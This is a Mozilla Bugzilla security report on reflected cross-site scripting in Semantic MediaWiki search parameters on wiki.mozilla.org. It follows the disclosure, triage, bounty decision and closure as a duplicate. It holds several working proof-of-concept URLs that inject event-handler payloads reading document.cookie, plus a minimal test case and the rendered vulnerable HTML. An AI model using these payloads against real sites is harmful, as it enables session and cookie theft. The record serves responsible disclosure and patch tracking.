Closed Bug 1041392 Opened 10 years ago Closed 10 years ago

xss in semantic search parameters

Categories

(Websites :: wiki.mozilla.org, defect)

Product:
Websites
Component:
wiki.mozilla.org
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

(Not tracked)

Status:
RESOLVED DUPLICATE of bug 801027

People

(Reporter: jeetjaiswal0, Assigned: curtisk)

Details

(Whiteboard: [site:wiki.mozilla.org][reporter-external])

Attachments

(1 file)

xs.JPG
129.32 KB, image/jpeg
Details
Attached image xs.JPG 
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 (Beta/Release)
Build ID: 20140605174243

Steps to reproduce:

Hello I am, Jitendra Jaiswal (security researcher)

 During my research I found some high security issue xss (cookie stolen) vulnerability in main domain  http://wiki.mozilla.org/

example :

 Domain:  http://wiki.mozilla.org/


Poc url steps for reproduce issue steps by using one of them

wiki.mozilla.org/index.php?eq=yes&offset=50%22%20onmouseover%3dprompt("xss")%20bad%3d%22&p=format%3Dtemplate/mainlabel%3D-2D/template%3DSecReviewActionTable&po=%3F%23-%0A%3FSecReview%20name%23-%0A%3FSecReview%20action%20item%20status%23-%0A%3FFeature%20version%23-%0A%3FSecReview%20action%20items%23-%0A&q=[[Category:SecReview]]%20[[SecReview%20action%20item%20status::In%20Progress]]&title=Special:Ask

for access cookie : wiki.mozilla.org/index.php?eq=yes&offset=50%22%20onmouseover%3dprompt(document.cookie)%20bad%3d%22&p=format%3Dtemplate/mainlabel%3D-2D/template%3DSecReviewActionTable&po=%3F%23-%0A%3FSecReview%20name%23-%0A%3FSecReview%20action%20item%20status%23-%0A%3FFeature%20version%23-%0A%3FSecReview%20action%20items%23-%0A&q=[[Category:SecReview]]%20[[SecReview%20action%20item%20status::In%20Progress]]&title=Special:Ask

steps for issue reproduce

1. go to below url : wiki.mozilla.org/index.php?eq=yes&offset=50%22%20onmouseover%3dprompt(document.cookie)%20bad%3d%22&p=format%3Dtemplate/mainlabel%3D-2D/template%3DSecReviewActionTable&po=%3F%23-%0A%3FSecReview%20name%23-%0A%3FSecReview%20action%20item%20status%23-%0A%3FFeature%20version%23-%0A%3FSecReview%20action%20items%23-%0A&q=[[Category:SecReview]]%20[[SecReview%20action%20item%20status::In%20Progress]]&title=Special:Ask

load the url in browser 

when you give above link to any user the xss payload stored in the page which is open now 

that url have an xss payload which access cookie as 

offset was set to 50" onmouseover=prompt(document.cookie) bad="


now when you/user move mouse courser for selecting template  on page which is shown in attachment image  link that make an xss alert which we put in url


why this work :

Vulnerability description
This script is vulnerable to stored Cross Site Scripting (XSS) attacks.

Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.


Attack details
URL encoded GET input offset was set to 50" onmouseover=prompt(document.cookie) bad="
The input is reflected inside a tag parameter between double quotes.


.

all the proof attach with this thats show xss is work and can be access cookie of an user related to site 
also send image for make alert for mouse move on location 

link of all xss proof m send link bcz we can send here only one file 

https://www.dropbox.com/s/gmdwpx0vv28338k/fxss.JPG
https://www.dropbox.com/s/rtd3wdvyax0y95t/xs.JPG?m=
https://www.dropbox.com/s/vk7qfgnu4y6yzez/xss%20mozila.JPG
https://www.dropbox.com/s/84fsbn1e5clp0ah/xxmozila.JPG

poc image in attchments




Actual results:

in the results we can say its make an xss high security issue for users who use this site 


steps for issue reproduce

1. go to below url : wiki.mozilla.org/index.php?eq=yes&offset=50%22%20onmouseover%3dprompt(document.cookie)%20bad%3d%22&p=format%3Dtemplate/mainlabel%3D-2D/template%3DSecReviewActionTable&po=%3F%23-%0A%3FSecReview%20name%23-%0A%3FSecReview%20action%20item%20status%23-%0A%3FFeature%20version%23-%0A%3FSecReview%20action%20items%23-%0A&q=[[Category:SecReview]]%20[[SecReview%20action%20item%20status::In%20Progress]]&title=Special:Ask

load the url in browser 

when you give above link to any user the xss payload stored in the page which is open now 

that url have an xss payload which access cookie as 

offset was set to 50" onmouseover=prompt(document.cookie) bad="


now when you/user move mouse courser for selecting template  on page which is shown in attachment image  link that make an xss alert which we put in url


Expected results:

we can use xss filter by using xss can't work and make users safe on platform of Mozilla
I don't see an xss here the cookie is being displayed by an in content call to onmouseover=prompt(document.cookie) and an onmouseover=prompt("xss") so this is not executing scripts from outside the domain thus not cross-site. Have you found an instance here where you can execute scripts from another domain?
Flags: needinfo?(jeetjaiswal0)
Assignee: nobody → curtisk
Whiteboard: [site:wiki.mozilla.org][reporter-external][verif?]
sorry for mistake as my first link not work but in my second link 

https://wiki.mozilla.org/index.php?eq=yes&offset=50%22%20onmouseover%3dalert%282%29%20bad%3d%22&p=format%3Dtemplate/mainlabel%3D-2D/template%3DSecReviewActionTable&po=%3F%23-%0A%3FSecReview%20name%23-%0A%3FSecReview%20action%20item%20status%23-%0A%3FFeature%20version%23-%0A%3FSecReview%20action%20items%23-%0A&q=[[Category:SecReview]]%20[[SecReview%20action%20item%20status::In%20Progress]]&title=Special:Ask

thats properly work and give you an xss alert of 2 numaric 

and as you say its not cross site issue  that i want to say its an type of xss issue if you not know about that then read owasp site 

https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29  

this define all type of issue 

and also you can see its an xss 

when users use this url that contain call onmouse over  over xss store on page and when users go to select tamplete this xss execute 


and one more thing all of field of this url have xss vulnrability   m use xss script only one field offset  but other all field also vulnrable for this attack
Flags: needinfo?(jeetjaiswal0)
At first glance this appears to be a dupe of bug 801027, however we are on mediawiki 1.19.11, which was released earlier this year. I wonder if there was a regression since bug 801027 says the upstream bug was fixed mid 2013
Status: UNCONFIRMED → NEW
Ever confirmed: true
Whiteboard: [site:wiki.mozilla.org][reporter-external][verif?] → [site:wiki.mozilla.org][reporter-external]
Group: mozilla-services-security → websites-security
Component: Web Site → wiki.mozilla.org
Product: Mozilla Services → Websites
(In reply to David Chan [:dchan] from comment #4)
> At first glance this appears to be a dupe of bug 801027, however we are on
> mediawiki 1.19.11, which was released earlier this year. I wonder if there
> was a regression since bug 801027 says the upstream bug was fixed mid 2013

bro how i seen this issue 801027  its block for me 

and if you upgrade this then its not an duplicate bro 

and as i say my link all parameter link sort offset title limit and all other parameter all are have this vulnrability
Summary: high security issue xss (cookie stolen) vulnerability in domain http://wiki.mozilla.org/ → xss in semantic search parameters
Mark, could you take a look at this please?
Flags: needinfo?(mah)
(In reply to Jitendra jaiswal from comment #5)
> (In reply to David Chan [:dchan] from comment #4)
> > At first glance this appears to be a dupe of bug 801027, however we are on
> > mediawiki 1.19.11, which was released earlier this year. I wonder if there
> > was a regression since bug 801027 says the upstream bug was fixed mid 2013
> 
> bro how i seen this issue 801027  its block for me 
> 
> and if you upgrade this then its not an duplicate bro 
> 
> and as i say my link all parameter link sort offset title limit and all



if you are not belive m give you more link for same issue with different parameter 

is this i am use sort parameter for xss payload

https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=[[Category%3ASecReview]]+[[SecReview+action+item+status%3A%3AIn+Progress]]&po=%3F%23-%0D%0A%3FSecReview+name%23-%0D%0A%3FSecReview+action+item+status%23-%0D%0A%3FFeature+version%23-%0D%0A%3FSecReview+action+items%23-%0D%0A&eq=yes&p[format]=template&sort_num=&order_num=ASC&p[limit]=&p[offset]=&p[link]=all&p[sort]=50%22+onmouseover%3Dalert%283%29+bad%3D%22&p[order]=&p[headers]=show&p[mainlabel]=-&p[intro]=&p[outro]=&p[searchlabel]=%E2%80%A6+further+results&p[default]=&p[sep]=%2C&p[template]=SecReviewActionTable&p[userparam]=&p[introtemplate]=&p[outrotemplate]=&eq=yes


in this i am use link parameter 

https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=[[Category%3ASecReview]]+[[SecReview+action+item+status%3A%3AIn+Progress]]&po=%3F%23-%0D%0A%3FSecReview+name%23-%0D%0A%3FSecReview+action+item+status%23-%0D%0A%3FFeature+version%23-%0D%0A%3FSecReview+action+items%23-%0D%0A&eq=yes&p[format]=template&sort_num=&order_num=ASC&p[limit]=&p[offset]=&p[link]=50%22+onmouseover%3Dalert%284%29+bad%3D%22&p[sort]=&p[order]=&p[headers]=show&p[mainlabel]=-&p[intro]=&p[outro]=&p[searchlabel]=%E2%80%A6+further+results&p[default]=&p[sep]=%2C&p[template]=SecReviewActionTable&p[userparam]=&p[introtemplate]=&p[outrotemplate]=&eq=yes



in this i am use order parameter 

https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=[[Category%3ASecReview]]+[[SecReview+action+item+status%3A%3AIn+Progress]]&po=%3F%23-%0D%0A%3FSecReview+name%23-%0D%0A%3FSecReview+action+item+status%23-%0D%0A%3FFeature+version%23-%0D%0A%3FSecReview+action+items%23-%0D%0A&eq=yes&p[format]=template&sort_num=&order_num=ASC&p[limit]=&p[offset]=&p[link]=&p[sort]=&p[order]=50%22+onmouseover%3Dalert%284%29+bad%3D%22&p[headers]=&p[mainlabel]=-&p[intro]=&p[outro]=&p[searchlabel]=%E2%80%A6+further+results&p[default]=&p[sep]=%2C&p[template]=SecReviewActionTable&p[userparam]=&p[introtemplate]=&p[outrotemplate]=&eq=yes

as i say all other also vulnerable for same
Note that I didn't mark it as a dupe since I couldn't determine if it was a regression or not. A minimal test case is.

https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=&p[format]=template&p[foo]=%22%20autofocus%20onfocus=alert%281%29%20%22

There is some interaction with the "q" parameter, p[format]=template and p[key] . Note that "key" can be anything. Under the above circumstances, the querystring it put inside a data-uri without proper encoding. This is the resulting HTML

<select id="formatSelector" name="p[format]" data-url="/index.php?title=Special:Ask&amp;showformatoptions=this.value&amp;params[foo]=\" autofocus="" onfocus="alert(1)" \"&params[offset]="&amp;params[limit]=&quot;">
Yah bro now you get my point the issue with the q parameter=tamplete parameter

And yes here you use some filter for Xss but for Xss useing event you are not filter here that make risk or Xss in site or soft whataver it is bro m what to ask that acording to you its patchable issue or not ...
Adding Wikimedia's security engineer and the other member of the MediaWiki release team.
Flags: needinfo?(mah)
Actually, this looks like a problem more in SMW, not MW itself.  Finding someone who can look at that.
Looks like this is fixed in the latest SMW.  At least, the following does not work: http://www.semantic-mediawiki.org/wiki/Special:Ask?q=&p[searchlabel]=%22%20autofocus%20onfocus=alert%281%29%20%22
(In reply to Mark A. Hershberger (hexmode) from comment #11)
> Actually, this looks like a problem more in SMW, not MW itself.  Finding
> someone who can look at that.

bro m not understand what you want to say 

your issue url and my are different  and your issue now not work 

but my issue still work ....

https://wiki.mozilla.org/index.php?title=Special%3AAsk&q=&p[format]=template&p[foo]=%22%20autofocus%20onfocus=alert%28document.cookie%29%20%22
(In reply to Jitendra jaiswal from comment #13)
> (In reply to Mark A. Hershberger (hexmode) from comment #11)
> > Actually, this looks like a problem more in SMW, not MW itself.  Finding
> > someone who can look at that.
> 
> bro m not understand what you want to say 

Your use of "bro" is strange.  In this context it reminds me of a brogrammer (http://www.cnn.com/2012/05/10/opinion/trapani-brogrammer-culture/index.html).

In any case, you did find a genuine bug in the SemanticMediaWiki extension.  It was reported back in April and fixed then in SemanticMediaWiki.  The fix hasn't yet been deployed to wiki.mozilla.org, so that site is still vulnerable.
No bro mean in India its as like big brother 

so m say that word 

and as you say find a genuine bug in the SemanticMediaWiki extension  

so that mean my issue confirm ... ?
(In reply to Jitendra jaiswal from comment #16)
> so that mean my issue confirm ... ?

You've found an issue on wiki.mozilla.org that is the result of an unpatched fix to a known problem.  I can confirm that.  I'm not in a position to make any other statement about the issue.
(In reply to Mark A. Hershberger (hexmode) from comment #17)
> is the result of an unpatched fix to a known problem.

Err, I meant "is the result of a known problem that hasn't been fixed by applying the patch that solves the problem."
its gone one year and also in my issue not one a one parameter have this issue have all parameter of my url are vulnerable that mean xss work on all parameter or field 

so any one can confirm me this is valid for Mozilla bug bounty program ...?
I've nominated this bug for the bounty committee to consider, that does not mean it will receive a bounty but they will review the issue and make a decision.
Flags: sec-bounty?
Yah I am already receive a mail for deep look on its may be tthats help in that
Thanks
HELLO 

AS ALL SAY THE ISSUE IS VALID CAN ANY ONE TELL ME 

ANY UPDATE ABOUT THIS ISSUE 

M NOT RECEIVE ANY UPDATE FOR THAT AND ITS GONE A MONTH
Hi Jitendra,

Thanks for reporting this issue, however wiki.mozilla.org is not covered under the current bounty program. [1] We intend to expand the bounty program in the future and will look into adding wiki. Unfortunately the committee has decided not to pay a bounty for this issue.


[1] - https://www.mozilla.org/security/bug-bounty-faq-webapp.html#eligible-bugs
Flags: sec-bounty? → sec-bounty-
thanks to all of you for giving a good response me :P
I'm calling this a dupe of bug 801027. The STR are exactly the same.

I'm waiting on access to the upstream bug, but clearly whatever the fix was didn't fix this issue (which is likely in the extension).
Status: NEW → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
(In reply to Gordon P. Hemsley [:GPHemsley] from comment #25)
> I'm calling this a dupe of bug 801027. The STR are exactly the same.
> 
> I'm waiting on access to the upstream bug, but clearly whatever the fix was
> didn't fix this issue (which is likely in the extension).

Sorry about that, the bug should have been public. I just opened it up:
https://bugzilla.wikimedia.org/show_bug.cgi?id=46852

The patch (https://gerrit.wikimedia.org/r/#/c/57433/) is included in the REL1_23 branch of the extension, and also the "1.9.x" branch. The current download of the SMW bundle from http://www.mediawiki.org/wiki/Semantic_Bundle also have the patch. Where is mozilla pulling the extension from?
Group: websites-security
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: